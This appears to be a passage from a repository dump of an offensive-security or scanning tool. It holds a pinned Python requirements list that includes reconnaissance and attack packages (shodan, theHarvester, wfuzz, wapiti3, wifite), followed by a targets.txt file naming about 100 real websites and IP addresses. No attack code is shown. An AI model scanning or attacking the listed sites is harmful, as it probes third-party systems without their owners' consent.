PyQt5==5.15.7 360 | PyQt5-sip==12.11.0 361 | PyQt6==6.4.0 362 | PyQt6-sip==13.4.0 363 | pyqtgraph==0.13.1 364 | pyquery==2.0.0 365 | pyramid==2.0 366 | pyrsistent==0.18.1 367 | pyserial==3.5 368 | pyShodan==0.2.3 369 | pysmi==0.3.2 370 | pysnmp==4.4.12 371 | PySocks==1.7.1 372 | pyspnego==0.1.5 373 | pytesseract==0.3.10 374 | pytest==7.2.1 375 | python-apt==2.5.0 376 | python-dateutil==2.8.2 377 | python-debian==0.1.49 378 | python-docx==0.8.11 379 | python-dotenv==0.21.0 380 | python-engineio==4.3.4 381 | python-gnupg==0.4.9 382 | python-gvm==22.9.0 383 | python-magic==0.4.26 384 | python-owasp-zap-v2.4==0.0.20 385 | python-pam==2.0.2 386 | python-pptx==0.6.18 387 | python-slugify==4.0.0 388 | python-snappy==0.5.3 389 | python-socketio==5.7.2 390 | python-status==1.0.1 391 | python-telegram-bot==13.15 392 | pythran==0.11.0 393 | PyTrie==0.4.0 394 | pytz==2022.7 395 | pytz-deprecation-shim==0.1.0.post0 396 | pytzdata==2020.1 397 | pyVNC==0.1 398 | pywerview==0.3.2 399 | pyxdg==0.28 400 | pyxnat==1.5 401 | PyYAML==6.0 402 | qrcode==7.3.1 403 | Quamash==0.6.1 404 | rdflib==6.2.0 405 | redis==4.3.4 406 | regex==2022.10.31 407 | repoze.lru==0.7 408 | requests==2.28.1 409 | requests-file==1.5.1 410 | requests-html==0.10.0 411 | requests-toolbelt==0.10.1 412 | retrying==1.3.3 413 | rfc3986==1.5.0 414 | rfc3987==1.3.8 415 | rich==13.0.0 416 | roman==3.3 417 | Routes==2.5.1 418 | rq==1.11.1 419 | rsa==4.9 420 | ruamel.yaml==0.17.21 421 | ruamel.yaml.clib==0.2.7 422 | rule-engine==3.5.0 423 | Rx==3.2.0 424 | scapy==2.4.5+g9420c22 425 | SciPy==1.8.1 426 | secure==0.3.0 427 | selenium==4.7.2 428 | service-identity==18.1.0 429 | setproctitle==1.3.1 430 | sgmllib3k==1.0.0 431 | shellescape==3.8.1 432 | shodan==1.28.0 433 | simple-rest-client==1.1.3 434 | simplejson==3.18.1 435 | simplekv==0.13.0 436 | six==1.16.0 437 | slowapi==0.1.4 438 | smmap==5.0.0 439 | smoke-zephyr==2.0.1 440 | sniffio==1.2.0 441 | snowballstemmer==2.2.0 442 | sortedcontainers==2.4.0 443 | soupsieve==2.3.2 444 | speaklater==1.4 445 | Sphinx==5.3.0 446 | spinners==0.0.24 447 | splinter==0.18.1 448 | SQLAlchemy==1.4.45 449 | sqlalchemy-schemadisplay==1.3 450 | SQLAlchemy-Utc==0.14.0 451 | sqlparse==0.4.2 452 | sslyze==5.1.1 453 | stack-data==0.6.2 454 | starlette==0.36.2 455 | stone==3.3.1 456 | sympy==1.11.1 457 | syslog-rfc5424-formatter==1.2.3 458 | tables==3.7.0 459 | tabulate==0.8.9 460 | telegram==0.0.1 461 | Telethon==1.26.1 462 | Tempita==0.5.2 463 | tempora==5.1.0 464 | termcolor==1.1.0 465 | terminaltables==3.1.10 466 | texttable==1.6.7 467 | theHarvester==4.2.0 468 | tinycss2==1.2.1 469 | tld==0.11.11 470 | tls-parser==1.2.2 471 | tomli==2.0.1 472 | tornado==6.1 473 | tqdm==4.64.1 474 | traitlets==5.5.0 475 | traits==6.3.2 476 | translationstring==1.4 477 | trio==0.22.0 478 | trio-websocket==0.9.2 479 | Twisted==22.4.0 480 | txaio==21.2.1 481 | typing_extensions==4.3.0 482 | tzlocal==4.2 483 | u-msgpack-python==2.3.0 484 | ufoLib2==0.14.0 485 | ujson==5.6.0 486 | unicodecsv==0.14.1 487 | unicodedata2==15.0.0 488 | unicrypto==0.0.9 489 | Unidecode==1.3.6 490 | uritemplate==4.1.1 491 | urllib3==1.26.12 492 | urwid==2.1.2 493 | uvicorn==0.17.6 494 | uvloop==0.17.0 495 | validate==1.1.0.dev0 496 | validators==0.20.0 497 | venusian==3.0.0 498 | virtualenv==20.17.1+ds 499 | w3lib==2.1.1 500 | wafw00f==2.2.0 501 | wapiti3==3.0.4 502 | wcwidth==0.2.5 503 | webargs==8.0.1 504 | webcolors==1.11.1 505 | webencodings==0.5.1 506 | WebOb==1.8.6 507 | websocket-client==1.2.3 508 | websockets==10.4 509 | websockify==0.10.0 510 | Werkzeug==2.2.2 511 | wfuzz==3.1.0 512 | whois==0.8 513 | wifite==2.6.6 514 | winacl==0.1.5 515 | wrapt==1.14.1 516 | wsaccel==0.6.3 517 | wsproto==1.2.0 518 | WTForms==3.0.1 519 | xdg==5 520 | xlrd==1.2.0 521 | XlsxWriter==3.0.2 522 | xlutils==2.0.0 523 | xlwt==1.3.0 524 | xmltodict==0.13.0 525 | yara-python==4.2.0 526 | yarl==1.8.2 527 | yaswfp==0.9.3 528 | zc.lockfile==2.0 529 | zipp==1.0.0 530 | zlib-wrapper==0.1.3 531 | zope.deprecation==4.4.0 532 | zope.interface==5.5.2 533 | -------------------------------------------------------------------------------- /version/targets.txt: -------------------------------------------------------------------------------- 1 | http://kobralocks.com 2 | http://georgian.za.net 3 | https://teltdown.com 4 | http://stitchaccounting.co.za 5 | http://happy.mikikk.co.jp 6 | http://nhsgilde.co.za 7 | http://atlanticphysio.co.za 8 | http://systemshouse.co.za 9 | http://sublimeconfectionery.co.za 10 | http://www.librogondwana.com.ar 11 | http://megro.co.za 12 | http://www.pipelinetape.co.za 13 | http://google.com 14 | http://savanacloud.com 15 | http://kobralocks.com 16 | http://essentialtours.com 17 | http://hq.prospec.co.th 18 | http://branch.prospec.co.th 19 | http://tj.allbest.org 20 | http://www.rabachino.com 21 | http://www.bbba-grh.com 22 | http://gruppomediacom.com 23 | http://www.ratiss.org 24 | http://www.560560.ru 25 | http://www.50-50-50.ru 26 | http://office.ratiss.org 27 | http://560560.ru 28 | http://50-50-50.ru 29 | http://itsallgoodforyou.com 30 | http://tirupurjobs.net 31 | http://apparelworld.org 32 | http://cht.e-bestis.com.tw 33 | http://apbw.e-bestis.com.tw 34 | http://doacoes.fussesp.sp.gov.br 35 | http://www.6y555.com 36 | http://www.nuclear-experts.net 37 | http://www.anecra.pt 38 | http://209.60.104.53 39 | http://baza.ds.org.rs 40 | http://oulitnet.co.za 41 | http://liteoptec.co.za 42 | http://0739.gwytk.com 43 | http://hr.systematixshares.com 44 | http://leader.gwytk.com 45 | http://www.rabachino.com 46 | http://b2b.modelberg.it 47 | http://hengyue-media.com 48 | http://webphone.zayhi.com 49 | http://koiis.co.kr 50 | http://223.255.137.119 51 | http://sys.betafac.com 52 | http://gateway.net.co 53 | http://hq.prospec.co.th 54 | http://branch.prospec.co.th 55 | http://rso.gie-vso.fr 56 | http://112acil.com 57 | http://magazam.net 58 | http://happy.mikikk.co.jp 59 | http://ns1.112acil.com 60 | http://shop.magazam.net 61 | http://www.atakan.com.tr 62 | http://www.magazam.net 63 | http://ns1.atakan.com.tr 64 | http://ns1.magazam.net 65 | http://ns1.vfbayi.com 66 | http://ns1.evdeiste.com 67 | http://ptdel.com 68 | http://Alibaba.com 69 | http://FoxNews.com 70 | Dictionary.com 71 | Hilton.com 72 | TheHill.com 73 | Washington.edu 74 | RedCross.org 75 | Fortune.com 76 | NYU.edu 77 | CBSLocal.com 78 | NetworkAdvertising.org 79 | ChicagoTribune.com 80 | Example.com 81 | Wikia.com 82 | AllAboutCookies.org 83 | NOAA.gov 84 | WorldBank.org 85 | Cornell.edu 86 | Ox.ac.uk 87 | N.org 88 | UCLA.edu 89 | CA.org 90 | ScienceMag.org 91 | Photobucket.com 92 | Entrepreneur.com 93 | StarwoodHotels.com 94 | MIT.edu 95 | BBC.com 96 | Apache.org 97 | LATimes.com 98 | Time.com 99 | TypePad.com 100 | DailyMail.co.uk 101 | Go.com 102 | Digg.com 103 | Gravatar.com 104 | --------------------------------------------------------------------------------